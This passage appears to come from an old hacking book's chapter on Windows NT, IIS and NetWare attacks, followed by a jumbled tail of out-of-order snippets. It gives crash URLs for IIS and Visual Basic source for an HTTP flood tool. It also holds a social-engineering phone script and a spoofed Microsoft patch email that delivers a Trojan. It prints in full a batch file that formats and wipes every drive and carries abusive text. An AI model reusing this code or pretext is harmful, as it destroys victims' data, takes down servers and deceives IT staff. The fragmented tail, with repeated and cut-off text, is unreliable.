568 Figure 10.9 DoS implications of the telnet hack attack. Figure 10.10 Dr. Watson to the rescue. At this point, IIS could immediately crash, or crash upon scheduled administrative service interruptions—essentially, upon administrative shutdown and/or service restart. The destructive requests include the following URLs: • www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase • www.victim.com/Scripts/Tools/Newdsn.exe?Create Severe Congestion Synopsis: Custom HTTP request saturation can cause severe resource degradation. Hack State: CPU congestion. 569 Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5. Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion, resulting in resource degradation and, ultimately, potential service denial. The program shown here was written in Visual Basic and includes only a single form (see Figure 10.12). Figure 10.11 IIS attack via custom HTTP request saturation. Figure 10.12 VB form for Main.frm. 570 main.frm Private Stopper& Private Sub Command1_Click() On Error GoTo ErrorHandler If Command1.Caption = "begin" Then If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a va lid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub Command1.Caption = "stop" Text3.Visible = True For a = 1 To Text2.Text If Stopper& = 1 Then Exit Sub Do While Inet1.StillExecuting DoEvents Loop Inet1.Execute Text1.Text, "GET " & Text1.Text Text3.Text = Text3.Text + 1 Next a Else Stopper& = 1 Command1.Caption = "begin" Text3.Visible = False End If Exit Sub ErrorHandler: MsgBox "Please enter a valid web server!", vbInformation, "" Exit Sub End Sub System Control The purpose of this section is to re-create a common system control attack on Win NT servers. Attacks like this one against IT staff happen almost everyday. For simplicity, this hack is broken into a few effortless steps: Step 1: The Search In this step, the attacker chooses an IT staff victim. Whether the attacker already knows the victim or searches the victim’s company Web site, it takes very little effort to perform some social engineering to reveal a target email address. Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos. This sample social engineering technique was like taking candy from a baby: • Hacker: “Good morning; my name is Joe Hacker from Microsoft. Please transfer me to your IT department. They are expecting my call as I am responding to a support call, ticket number 110158.” • Reception: “Oh, okay. Do you have the name of the person you are trying to reach?” • Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of hacker typing on the keyboard). Nope, only this contact number.’’ • Reception: “I’ll transfer you to Tom; he’s in IT. He’ll know who to transfer you to.” • Tom: “Hello?” • Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support. I’m responding to a support call, ticket number 110158, and I’m making this call to put your staff on our automated NT security alert list.” 571 • Tom: “Whom were you trying to reach?” • Hacker: “Our terminals are down this morning; all I have is this contact number. All I need is an IT staff email address to add to our automated NT security alert list. When new patches are available for any substantiated NT vulnerabilities, the recipient will receive updates. Currently, three new patches are available in queue. Also… ” (interrupted) • Tom: “Cool; it’s a pain trying to keep up with these patches.” • Hacker: “It says here your primary Web server is running IIS. Which version is it?” • Tom: “Believe it or not, it’s 3.0. We’re completely swamped, so we’ve put this on the back burner. You can use my address for the advisories; it’s tom.fooled@victim.com.” • Hacker: “Consider it done, ticket closed. Have a nice day.” Step 2: The Alert During this step, the attacker decides on the remote-control daemon and accompanying message. In this particular case, the attacker chose phAse Zero: Port: 555, 9989 Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these Trojans is to destroy the target system. The only saving grace is that these daemons can only infect a system upon execution of setup programs that need to be run on the host. Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived (spoofed from Microsoft): >On 10 Oct 2000, at 18:09, support@microsoft.com wrote: > >Issue >===== >This vulnerability involves the HTTP GET method, which is used to obtain >information from an IIS Web server. Specially malformed GET requests can >create a denial-of-service situation that consumes all server resources, >causing a server to “hang.” In some cases, the server can be put back into >service by stopping and restarting IIS; in others, the server may need to >be rebooted. This situation cannot happen accidentally. The malformed GET >requests must be deliberately constructed and sent to the server. It is >important to note that this vulnerability does not allow data on the >server to be compromised, nor does it allow any privileges on it to be usurped. 572 > >Affected Software Versions >========================== > - Microsoft Internet Information Server, version 3.0 and 4.0, on x86 and >Alpha platforms. > >What Customers Should Do >======================== >The attached patch for this vulnerability is fully supported and should be applied > immediately, as all systems are determined to be at risk of attack. Microsoft recommends >that customers evaluate the degree of risk that this vulnerability poses to their systems, >based on physical accessibility, network, and Internet connectivity, and other factors. > > >Obtaining Support on This Issue >=============================== >This is a supported patch. If you have problems installing >this patch, or require technical assistance with this patch, >please contact Microsoft Technical Support. For information >on contacting Microsoft Technical Support, please see >http://support.microsoft.com/support/contact/default.asp. > > >Revisions >========= > - October 10, 2000: Bulletin Created > 573 > >For additional security-related information about Microsoft products, >please visit http://www.microsoft.com/security > > > > >THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS- >IS” WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER >EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND >FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS >SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, >INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, >EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE >POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR >LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE >FOREGOING LIMITATION MAY NOT APPLY. > >(c) 2000 Microsoft Corporation. All rights reserved. Terms of Use. > > ******************************************************************* >You have received this email bulletin as a result of your registration >to the Microsoft Product Security Notification Service. You may 574 >unsubscribe from this email notification service at any time by sending >an email to MICROSOFT_SECURITY-SIGNOFF- REQUEST@ANNOUNCE.MICROSOFT.COM >The subject line and message body are not used in processing the request, >and can be anything you like. > >For more information on the Microsoft Security Notification Service >please visit http://www.microsoft.com/security/bulletin.htm. For >security-related information about Microsoft products, please visit the >Microsoft Security Advisor Web site at http://www.microsoft.com/security. Step 3: Another Successful Victim During this step, the attacker simply waits a few days before exercising complete remote control with the phAse zero client, as shown in Figure 10.13. Miscellaneous Mayhem Windows 3x, 9x, 2000 Hack State: Hard drive obliteration. File: HDKill.bat. Synopsis: Some hackers enjoy generating havoc among their victims. This nasty hard-drive killer, for example, has been attached to countless emails, Figure 10.13 Complete control with phAse Zero. 575 and distributed with game evaluations as a ReadMe.bat file. In other cases, hackers go to the trouble of breaking into systems only to add this file to the system bootup process. Careful inspection of the code will reveal its purpose. Hdkill.bat @echo off :start cls echo PLEASE WAIT WHILE PROGRAM LOADS… call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat >nul set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul > {t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS… echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/- p $b find "bytes" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS… echo @prompt dir %%%%1:.\/ad/w/- p $b find " 0 bytes free" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS… echo :enddc >>drivechk.bat :testdrv for %%a in (%alldrive%) do call drivechk.bat %%a >nul del drivechk.bat >nul :form_del call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers 576 your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest > nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows reco vers your system… >>c:\autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:\autoexec.bat echo echo If you ran this file, then sorry, I just made it. The pur pose of this program is to tell you the following… >>c:\autoexec.bat echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:\autoexec.bat echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:\autoexec.bat echo echo 4. If you are Australian, I feel sorry for you, accept my sympathy, you retard. >>c:\autoexec.bat echo echo 5. Don't support the following: War, Racism, Drugs and th e Liberal Party.>>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Regards, >>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Munga Bunga >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat 577 :makedir if exist c:\temp.bat attrib -r -h c:\temp.bat >nul echo @echo off >c:\temp.bat echo %%1:\ >>c:\temp.bat echo cd\ >>c:\temp.bat echo :startmd >>c:\temp.bat echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole !!!! >>c:\temp.bat echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\ %%2\% %2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%% 2\%%2 \%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat call attrib +r +h c:\temp.bat >nul cls echo Initializing Variables… for %%a in (%drive%) do call format %%a: /q /u /autotest >nul cls echo Initializing Variables… echo Validating Data… for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul cls echo Initializing Variables… echo Validating Data… echo Analyzing System Structure… for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul call attrib +r +h c:\temp.bat >nul call attrib +r +h c:\autoexec.bat >nul cls echo Initializing Variables… echo Validating Data… echo Analyzing System Structure… echo Initializing Application… for %%a in (%drive%) call deltree /y %%a:\*. >nul cls echo Initializing Variables… echo Validating Data… echo Analyzing System Structure… echo Initializing Application… echo Starting Application… for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul cls echo Thank you for using a Munga Bunga product. echo. echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. echo. echo Here is a joke for you… [...]... program is almost too simple to use: the only requirement is that the attacker have Read access to the target file Figure 10. 18 Locking files with Bastard Miscellaneous Mayhem Disappearing Disk Usage Synopsis: Hackers can crash hard drives by filling up all available space 584 Hack State: System crash Vulnerabilities: NetWare 2/3 Breach: Burn.c by the infamous hacker, Jitsu-Disk depletes available... NETCRACK Common user accounts in NetWare and affiliated hardware partners include: PRINT WANGTEK LASER FAX HPLASER FAXUSER Figure 10.17 Hacking with NetCrack PRINTER FAXWORKS LASERWRITER TEST POST ARCHIVIST MAIL CHEY_ARCHSVR GATEWAY WINDOWS_PASSTHRU GATE ROOT ROUTER WINSABRE BACKUP SUPERVISOR System Control Backdoor Installation Synopsis: After gaining administrative access, hackers follow a. .. the backdoor and to enable its login to show up in the normal tools that show active connections Locking Files Synopsis: Inside and local hackers can wreak havoc by modifying file usability Hack State: File control Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files This hack attack, associated with a program... this point, and on the same address scheme as the administrator and/or target server, the hacker loads an IPX packet sniffer and waits to capture the system password Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully) If the attacker wants to conceal evidence of the hack, he or she erases the system log from //etc/console.log by unloading and reloading the... concludes with a compilation of Underground Novell NetWare hack attacks This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller 585 Accounts • Distinguishing valid account names on... environments, unpassworded admin and guest accounts have been unveiled It is possible, however, that the system administrator has renamed the administrator account Hackers know that by typing “NBTSTAT -A ipaddress” reveals the new administrator account Passwords • • Accessing the password file The location of the NT security database is located in \\WINNT\SYSTEM32\CONFIG\SAM By default, the SAM is readable, but... attacks This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller 579 Figure 10.16 Hacking with NTAdmin Common Accounts Two accounts typically come with NT: administrator and guest In numerous... database This process can be painless, by using hacker/programmer Jeremy Allison’s PWDUMP, coupled with a password-cracking program as defined earlier in this chapter 580 From the Console • Information gathering From the console on a domain controller, hackers use the following simple steps to get a list of accounts on the target machine With a list of user accounts, they can target individual attacks: ... is a common Underground password cracker for NT Operating remotely or locally, an attacker can port custom dictionaries on behalf of the attempted login username and/or password What’s unique with this particular tool is the speed at which simulated logons can be attempted (see Figure 10.15) Hack State: Administrative privileges exploitation File: NTAdmin.exe Synopsis: Local attackers exploit vulnerable... log_error ("parse_header: malloc failed"); return -1; } *header = h; h->name = NULL; h->value = NULL; n = read_until (fd, ':', &data); if (n name = data; len = n; n = read_until (fd, '\r', &data); if (n . some hackers are keen on causing chaos by locking files. This hack attack, associated with a program called Bastard by The Grenadier (Underground hacker/programmer) (Figure 10. 18) , is popular among. the hacker loads an IPX packet sniffer and waits to capture the system password. Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully). If the attacker. some social engineering to reveal a target email address. Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos.